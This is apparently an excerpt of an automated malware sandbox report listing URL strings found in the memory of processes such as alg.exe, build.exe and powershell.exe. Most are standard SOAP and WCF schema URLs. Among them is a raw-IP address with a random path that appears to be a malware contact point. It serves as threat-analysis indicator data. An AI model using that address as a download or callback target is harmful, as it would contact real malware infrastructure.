                            Source: alg.exe, 00000009.00000003.3156928709.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3048558345.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3169068917.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3060374401.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2975335028.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3120774885.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140/hdqasqyy
                            Source: alg.exe, 00000009.00000003.2975335028.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140:80/hdqasqyycb
                            Source: powershell.exe, 0000000A.00000002.2215859969.00000000072E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsn
                            Source: powershell.exe, 0000000A.00000002.2215859969.0000000007301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                            Source: powershell.exe, 0000000A.00000002.2208880133.000000000581D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000000A.00000002.2200928108.0000000004905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: AppVClient.exe, 00000016.00000002.2186021378.0000000000522000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.2182914960.0000000000512000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.2181851858.0000000000503000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.2182028014.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                            Source: powershell.exe, 0000000A.00000002.2200928108.0000000004905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2200928108.00000000047B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                            Source: powershell.exe, 0000000A.00000002.2200928108.0000000004905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000003327000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                            Source: build.exe, 00000007.00000002.2559158756.00000000031E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                            Source: build.exe, 00000007.00000002.2559158756.00000000031E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.000000000315A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                            Source: build.exe, 00000007.00000002.2559158756.00000000031E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
